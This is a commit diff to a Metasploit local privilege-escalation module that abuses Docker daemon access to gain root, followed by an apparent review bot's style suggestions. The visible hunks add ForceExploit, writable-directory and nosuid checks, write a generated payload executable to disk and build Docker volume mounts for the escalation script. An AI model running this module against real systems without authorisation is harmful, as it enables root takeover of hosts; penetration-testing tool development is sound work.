Add check for writable and nosuid WritableDir

GSoC/Meterpreter_Web_Console
Brendan Coles 2019-01-11 22:41:14 +00:00
parent d18c6bd158
commit 20fd6b6134
1 changed files with 29 additions and 2 deletions


@ -29,12 +29,18 @@ class MetasploitModule < Msf::Exploit::Local
}
))
register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
])
end
def base_dir
datastore['WritableDir'].to_s
end
def check
if cmd_exec('docker ps && echo true') =~ /true$/
print_good("Docker daemon is accessible.")
Exploit::CheckCode::Vulnerable
else
print_error("Failed to access Docker daemon.")
@ -43,8 +49,29 @@ class MetasploitModule < Msf::Exploit::Local
end
def exploit
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
if nosuid? base_dir
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
end
pl = generate_payload_exe
exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
print_status("Writing payload executable to '#{exe_path}'")
write_file(exe_path, pl)
@ -59,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Local
end
def shell_script(exploit_path)
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
%Q{
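Review bot: In `exploit`, the new `is_root?` guard prints nothing when ForceExploit overrides it, whereas the check-result guard just above it prints a warning on the same override path, so the module output does not record that the root check was bypassed. The nested `if`/`unless` could be flattened to a single condition, `if is_root? && !datastore['ForceExploit']`, around the existing `fail_with`, with a `print_warning 'Session already has root privileges'` for the overridden case. The new `base_dir` helper would also benefit from a one-line comment such as `# Staging directory for files written by this module (WritableDir advanced option)`. The bodies of `exploit` and `shell_script` continue outside the visible hunks, so a warning emitted later in `exploit` would not be seen here.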